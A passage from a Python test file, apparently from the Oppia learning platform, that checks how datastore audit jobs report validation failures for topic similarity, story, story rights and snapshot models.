'Art': {'Art': '1.0', 'Biology': '0.5'}
}
self.model_instance.content = content
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for topic similarity check '
'of TopicSimilaritiesModel\', [u"Entity id topics: '
'Topic similarity validation for content: {u\'Art\': '
'{u\'Biology\': u\'0.5\', u\'Art\': u\'1.0\'}} fails with '
'error: Length of topic similarities rows: 2 does not match '
'length of topic list: 1."]]')]
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_similarity_type(self):
content = {
'Art': {'Art': 'one', 'Biology': 0.5},
'Biology': {'Art': 0.5, 'Biology': 1.0}
}
self.model_instance.content = content
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for topic similarity '
'check of TopicSimilaritiesModel\', '
'[u"Entity id topics: Topic similarity validation for '
'content: {u\'Biology\': {u\'Biology\': 1.0, u\'Art\': 0.5}, '
'u\'Art\': {u\'Biology\': 0.5, u\'Art\': u\'one\'}} '
'fails with error: Expected similarity to be a float, '
'received one"]]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_similarity_value(self):
content = {
'Art': {'Art': 10.0, 'Biology': 0.5},
'Biology': {'Art': 0.5, 'Biology': 1.0}
}
self.model_instance.content = content
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for topic similarity check '
'of TopicSimilaritiesModel\', '
'[u"Entity id topics: Topic similarity validation for '
'content: {u\'Biology\': {u\'Biology\': 1.0, u\'Art\': 0.5}, '
'u\'Art\': {u\'Biology\': 0.5, u\'Art\': 10.0}} '
'fails with error: Expected similarity to be between '
'0.0 and 1.0, received 10.0"]]')]
run_job_and_check_output(self, expected_output)
def test_model_with_assymetric_content(self):
content = {
'Art': {'Art': 1.0, 'Biology': 0.5},
'Biology': {'Art': 0.6, 'Biology': 1.0}
}
self.model_instance.content = content
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for topic similarity '
'check of TopicSimilaritiesModel\', '
'[u"Entity id topics: Topic similarity validation for '
'content: {u\'Biology\': {u\'Biology\': 1.0, u\'Art\': 0.6}, '
'u\'Art\': {u\'Biology\': 0.5, u\'Art\': 1.0}} fails with error: '
'Expected topic similarities to be symmetric."]]')]
run_job_and_check_output(self, expected_output)
class StoryModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(StoryModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(6)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
topic = topic_domain.Topic.create_default_topic(
topic_id='0', name='topic')
language_codes = ['ar', 'en', 'en']
stories = [story_domain.Story.create_default_story(
'%s' % i,
title='title %d',
corresponding_topic_id='0'
) for i in xrange(3)]
for index, story in enumerate(stories):
story.language_code = language_codes[index]
story.add_node('node_1', 'Node1')
story.add_node('node_2', 'Node2')
story.update_node_destination_node_ids('node_1', ['node_2'])
story.update_node_exploration_id(
'node_1', explorations[index * 2].id)
story.update_node_exploration_id(
'node_2', explorations[index * 2 + 1].id)
topic.add_canonical_story(story.id)
story_services.save_new_story(self.owner_id, story)
topic_services.save_new_topic(self.owner_id, topic)
self.model_instance_0 = story_models.StoryModel.get_by_id('0')
self.model_instance_1 = story_models.StoryModel.get_by_id('1')
self.model_instance_2 = story_models.StoryModel.get_by_id('2')
self.job_class = (
prod_validation_jobs_one_off.StoryModelAuditOneOffJob)
def test_standard_operation(self):
story_services.update_story(
self.owner_id, '0', [story_domain.StoryChange({
'cmd': 'update_story_property',
'property_name': 'title',
'new_value': 'New title',
'old_value': 'title 0'
})], 'Changes.')
expected_output = [
u'[u\'fully-validated StoryModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.commit(
feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
expected_output = [
(
u'[u\'failed validation check for time field relation check '
'of StoryModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
),
u'[u\'fully-validated StoryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
expected_output = [(
u'[u\'failed validation check for current time check of '
'StoryModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_story_schema(self):
expected_output = [
(
u'[u\'failed validation check for domain object check of '
'StoryModel\', '
'[u\'Entity id %s: Entity fails domain validation with the '
'error Invalid language code: %s\']]'
) % (self.model_instance_0.id, self.model_instance_0.language_code),
u'[u\'fully-validated StoryModel\', 2]']
with self.swap(
constants, 'ALL_LANGUAGE_CODES', [{
'code': 'en', 'description': 'English'}]):
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_model_failure(self):
exp_models.ExplorationModel.get_by_id('1').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_ids field '
'check of StoryModel\', '
'[u"Entity id 0: based on field exploration_ids having value '
'1, expect model ExplorationModel with id 1 but it '
'doesn\'t exist"]]'),
u'[u\'fully-validated StoryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_story_commit_log_entry_model_failure(self):
story_services.update_story(
self.owner_id, '0', [story_domain.StoryChange({
'cmd': 'update_story_property',
'property_name': 'title',
'new_value': 'New title',
'old_value': 'title 0'
})], 'Changes.')
story_models.StoryCommitLogEntryModel.get_by_id(
'story-0-1').delete()
expected_output = [
(
u'[u\'failed validation check for '
'story_commit_log_entry_ids field check of '
'StoryModel\', '
'[u"Entity id 0: based on field '
'story_commit_log_entry_ids having value '
'story-0-1, expect model StoryCommitLogEntryModel '
'with id story-0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated StoryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_summary_model_failure(self):
story_models.StorySummaryModel.get_by_id('0').delete()
expected_output = [
(
u'[u\'failed validation check for story_summary_ids '
'field check of StoryModel\', '
'[u"Entity id 0: based on field story_summary_ids having '
'value 0, expect model StorySummaryModel with id 0 '
'but it doesn\'t exist"]]'),
u'[u\'fully-validated StoryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_story_rights_model_failure(self):
story_models.StoryRightsModel.get_by_id(
'0').delete(feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for story_rights_ids '
'field check of StoryModel\', '
'[u"Entity id 0: based on field story_rights_ids having '
'value 0, expect model StoryRightsModel with id 0 but '
'it doesn\'t exist"]]'),
u'[u\'fully-validated StoryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_metadata_model_failure(self):
story_models.StorySnapshotMetadataModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_metadata_ids '
'field check of StoryModel\', '
'[u"Entity id 0: based on field snapshot_metadata_ids having '
'value 0-1, expect model StorySnapshotMetadataModel '
'with id 0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated StoryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_content_model_failure(self):
story_models.StorySnapshotContentModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_content_ids '
'field check of StoryModel\', '
'[u"Entity id 0: based on field snapshot_content_ids having '
'value 0-1, expect model StorySnapshotContentModel '
'with id 0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated StoryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class StorySnapshotMetadataModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(StorySnapshotMetadataModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
topic = topic_domain.Topic.create_default_topic(
topic_id='0', name='topic')
stories = [story_domain.Story.create_default_story(
'%s' % i,
title='title %d' % i,
corresponding_topic_id='0'
) for i in xrange(3)]
for story in stories:
if story.id != '0':
story_services.save_new_story(self.owner_id, story)
else:
story_services.save_new_story(self.user_id, story)
topic.add_canonical_story(story.id)
topic_services.save_new_topic(self.owner_id, topic)
self.model_instance_0 = (
story_models.StorySnapshotMetadataModel.get_by_id(
'0-1'))
self.model_instance_1 = (
story_models.StorySnapshotMetadataModel.get_by_id(
'1-1'))
self.model_instance_2 = (
story_models.StorySnapshotMetadataModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.StorySnapshotMetadataModelAuditOneOffJob)
def test_standard_operation(self):
story_services.update_story(
self.owner_id, '0', [story_domain.StoryChange({
'cmd': 'update_story_property',
'property_name': 'title',
'new_value': 'New title',
'old_value': 'title 0'
})], 'Changes.')
expected_output = [
u'[u\'fully-validated StorySnapshotMetadataModel\', 4]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of StorySnapshotMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'StorySnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'StorySnapshotMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_story_model_failure(self):
story_models.StoryModel.get_by_id('0').delete(
self.user_id, '', [])
expected_output = [
(
u'[u\'failed validation check for story_ids '
'field check of StorySnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field story_ids '
'having value 0, expect model StoryModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'story_ids having value 0, expect model '
'StoryModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'StorySnapshotMetadataModel\', 2]')]
run_job_and_check_output(
self, expected_output, literal_eval=True)
def test_missing_committer_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for committer_ids field '
'check of StorySnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field committer_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]'
) % (self.user_id, self.user_id), (
u'[u\'fully-validated '
'StorySnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_story_version_in_model_id(self):
model_with_invalid_version_in_id = (
story_models.StorySnapshotMetadataModel(
id='0-3', committer_id=self.owner_id, commit_type='edit',
commit_message='msg', commit_cmds=[{}]))
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for story model '
'version check of StorySnapshotMetadataModel\', '
'[u\'Entity id 0-3: Story model corresponding to '
'id 0 has a version 1 which is less than the version 3 in '
'snapshot metadata model id\']]'
), (
u'[u\'fully-validated StorySnapshotMetadataModel\', '
'3]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_cmd_schmea(self):
self.model_instance_0.commit_cmds = [{
'cmd': 'add_story_node'
}, {
'cmd': 'delete_story_node',
'invalid_attribute': 'invalid'
}]
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit cmd '
'delete_story_node check of '
'StorySnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'delete_story_node\', '
'u\'invalid_attribute\': u\'invalid\'} failed with error: '
'The following required attributes are missing: '
'node_id, The following extra attributes are present: '
'invalid_attribute"]]'
), (
u'[u\'failed validation check for commit cmd add_story_node '
'check of StorySnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'add_story_node\'} '
'failed with error: The following required attributes '
'are missing: node_id, title"]]'
), u'[u\'fully-validated StorySnapshotMetadataModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class StorySnapshotContentModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(StorySnapshotContentModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
topic = topic_domain.Topic.create_default_topic(
topic_id='0', name='topic')
stories = [story_domain.Story.create_default_story(
'%s' % i,
title='title %d' % i,
corresponding_topic_id='0'
) for i in xrange(3)]
for story in stories:
story_services.save_new_story(self.owner_id, story)
topic.add_canonical_story(story.id)
topic_services.save_new_topic(self.owner_id, topic)
self.model_instance_0 = (
story_models.StorySnapshotContentModel.get_by_id(
'0-1'))
self.model_instance_1 = (
story_models.StorySnapshotContentModel.get_by_id(
'1-1'))
self.model_instance_2 = (
story_models.StorySnapshotContentModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.StorySnapshotContentModelAuditOneOffJob)
def test_standard_operation(self):
story_services.update_story(
self.owner_id, '0', [story_domain.StoryChange({
'cmd': 'update_story_property',
'property_name': 'title',
'new_value': 'New title',
'old_value': 'title 0'
})], 'Changes.')
expected_output = [
u'[u\'fully-validated StorySnapshotContentModel\', 4]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of StorySnapshotContentModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'StorySnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'StorySnapshotContentModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_story_model_failure(self):
story_models.StoryModel.get_by_id('0').delete(self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for story_ids '
'field check of StorySnapshotContentModel\', '
'[u"Entity id 0-1: based on field story_ids '
'having value 0, expect model StoryModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'story_ids having value 0, expect model '
'StoryModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'StorySnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_story_version_in_model_id(self):
model_with_invalid_version_in_id = (
story_models.StorySnapshotContentModel(
id='0-3'))
model_with_invalid_version_in_id.content = {}
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for story model '
'version check of StorySnapshotContentModel\', '
'[u\'Entity id 0-3: Story model corresponding to '
'id 0 has a version 1 which is less than '
'the version 3 in snapshot content model id\']]'
), (
u'[u\'fully-validated StorySnapshotContentModel\', '
'3]')]
run_job_and_check_output(self, expected_output, sort=True)
class StoryRightsModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(StoryRightsModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
self.admin = user_services.UserActionsInfo(self.admin_id)
manager1_email = 'user@manager1.com'
manager2_email = 'user@manager2.com'
self.signup(manager1_email, 'manager1')
self.signup(manager2_email, 'manager2')
self.set_topic_managers(['manager1', 'manager2'])
self.manager1_id = self.get_user_id_from_email(manager1_email)
self.manager2_id = self.get_user_id_from_email(manager2_email)
self.manager1 = user_services.UserActionsInfo(self.manager1_id)
self.manager2 = user_services.UserActionsInfo(self.manager2_id)
topic = topic_domain.Topic.create_default_topic(
topic_id='0', name='topic')
stories = [story_domain.Story.create_default_story(
'%s' % i,
title='title %d' % i,
corresponding_topic_id='0'
) for i in xrange(3)]
for story in stories:
story_services.save_new_story(self.owner_id, story)
topic.add_canonical_story(story.id)
topic_services.save_new_topic(self.owner_id, topic)
story_services.assign_role(
self.admin, self.manager1, story_domain.ROLE_MANAGER, stories[0].id)
story_services.assign_role(
self.admin, self.manager2, story_domain.ROLE_MANAGER, stories[0].id)
story_services.assign_role(
self.admin, self.manager2, story_domain.ROLE_MANAGER, stories[1].id)
self.model_instance_0 = story_models.StoryRightsModel.get_by_id('0')
self.model_instance_1 = story_models.StoryRightsModel.get_by_id('1')
self.model_instance_2 = story_models.StoryRightsModel.get_by_id('2')
self.job_class = (
prod_validation_jobs_one_off.StoryRightsModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated StoryRightsModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.commit(
feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of StoryRightsModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated StoryRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
expected_output = [(
u'[u\'failed validation check for current time check of '
'StoryRightsModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_story_model_failure(self):
story_models.StoryModel.get_by_id('0').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for story_ids '
'field check of StoryRightsModel\', '
'[u"Entity id 0: based on field story_ids having '
'value 0, expect model StoryModel with id 0 but '
'it doesn\'t exist"]]'),
u'[u\'fully-validated StoryRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_manager_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.manager1_id).delete()
expected_output = [
(
u'[u\'failed validation check for manager_user_ids '
'field check of StoryRightsModel\', '
'[u"Entity id 0: based on field manager_user_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]') % (
self.manager1_id, self.manager1_id),
u'[u\'fully-validated StoryRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_metadata_model_failure(self):
story_models.StoryRightsSnapshotMetadataModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_metadata_ids '
'field check of StoryRightsModel\', '
'[u"Entity id 0: based on field snapshot_metadata_ids having '
'value 0-1, expect model '
'StoryRightsSnapshotMetadataModel '
'with id 0-1 but it doesn\'t exist"]]'
),
u'[u\'fully-validated StoryRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_content_model_failure(self):
story_models.StoryRightsSnapshotContentModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_content_ids '
'field check of StoryRightsModel\', '
'[u"Entity id 0: based on field snapshot_content_ids having '
'value 0-1, expect model StoryRightsSnapshotContentModel '
'with id 0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated StoryRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class StoryRightsSnapshotMetadataModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(StoryRightsSnapshotMetadataModelValidatorTests, self).setUp(
)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
topic = topic_domain.Topic.create_default_topic(
topic_id='0', name='topic')
stories = [story_domain.Story.create_default_story(
'%s' % i,
title='title %d' % i,
corresponding_topic_id='0'
) for i in xrange(3)]
for story in stories:
if story.id != '0':
story_services.save_new_story(self.owner_id, story)
else:
story_services.save_new_story(self.user_id, story)
topic.add_canonical_story(story.id)
topic_services.save_new_topic(self.owner_id, topic)
self.model_instance_0 = (
story_models.StoryRightsSnapshotMetadataModel.get_by_id(
'0-1'))
self.model_instance_1 = (
story_models.StoryRightsSnapshotMetadataModel.get_by_id(
'1-1'))
self.model_instance_2 = (
story_models.StoryRightsSnapshotMetadataModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.StoryRightsSnapshotMetadataModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated StoryRightsSnapshotMetadataModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of StoryRightsSnapshotMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'StoryRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'StoryRightsSnapshotMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_story_rights_model_failure(self):
story_models.StoryRightsModel.get_by_id('0').delete(
self.user_id, '', [])
expected_output = [
(
u'[u\'failed validation check for story_rights_ids '
'field check of StoryRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field story_rights_ids '
'having value 0, expect model StoryRightsModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'story_rights_ids having value 0, expect model '
'StoryRightsModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'StoryRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_committer_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for committer_ids field '
'check of StoryRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field committer_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]'
) % (self.user_id, self.user_id), (
u'[u\'fully-validated '
'StoryRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_story_version_in_model_id(self):
model_with_invalid_version_in_id = (
story_models.StoryRightsSnapshotMetadataModel(
id='0-3', committer_id=self.owner_id, commit_type='edit',
commit_message='msg', commit_cmds=[{}]))
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for story rights model '
'version check of StoryRightsSnapshotMetadataModel\', '
'[u\'Entity id 0-3: StoryRights model corresponding to '
'id 0 has a version 1 which is less than the version 3 in '
'snapshot metadata model id\']]'
), (
u'[u\'fully-validated '
'StoryRightsSnapshotMetadataModel\', 3]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_cmd_schmea(self):
self.model_instance_0.commit_cmds = [{
'cmd': 'change_role',
'assignee_id': 'id',
'new_role': 'manager'
}, {
'cmd': 'publish_story',
'invalid_attribute': 'invalid'
}]
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit cmd '
'change_role check of '
'StoryRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'assignee_id\': u\'id\', '
'u\'cmd\': u\'change_role\', u\'new_role\': u\'manager\'} '
'failed with error: The following required attributes '
'are missing: old_role"]]'
), (
u'[u\'failed validation check for commit cmd publish_story '
'check of StoryRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'publish_story\', '
'u\'invalid_attribute\': u\'invalid\'} failed with error: '
'The following extra attributes are present: '
'invalid_attribute"]]'
), u'[u\'fully-validated StoryRightsSnapshotMetadataModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class StoryRightsSnapshotContentModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(StoryRightsSnapshotContentModelValidatorTests, self).setUp(
)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
topic = topic_domain.Topic.create_default_topic(
topic_id='0', name='topic')
stories = [story_domain.Story.create_default_story(
'%s' % i,
title='title %d' % i,
corresponding_topic_id='0'
) for i in xrange(3)]
for story in stories:
story_services.save_new_story(self.owner_id, story)
topic.add_canonical_story(story.id)
topic_services.save_new_topic(self.owner_id, topic)
self.model_instance_0 = (
story_models.StoryRightsSnapshotContentModel.get_by_id(
'0-1'))
self.model_instance_1 = (
story_models.StoryRightsSnapshotContentModel.get_by_id(
'1-1'))
self.model_instance_2 = (
story_models.StoryRightsSnapshotContentModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.StoryRightsSnapshotContentModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated StoryRightsSnapshotContentModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of StoryRightsSnapshotContentModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'StoryRightsSnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'StoryRightsSnapshotContentModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_story_model_failure(self):
story_models.StoryRightsModel.get_by_id('0').delete(
self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for story_rights_ids '
'field check of StoryRightsSnapshotContentModel\', '
'[u"Entity id 0-1: based on field story_rights_ids '
'having value 0, expect model StoryRightsModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'story_rights_ids having value 0, expect model '
'StoryRightsModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'StoryRightsSnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_story_version_in_model_id(self):
model_with_invalid_version_in_id = (
story_models.StoryRightsSnapshotContentModel(
id='0-3'))
model_with_invalid_version_in_id.content = {}
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for story rights model '
'version check of StoryRightsSnapshotContentModel\', '
'[u\'Entity id 0-3: StoryRights model corresponding to '
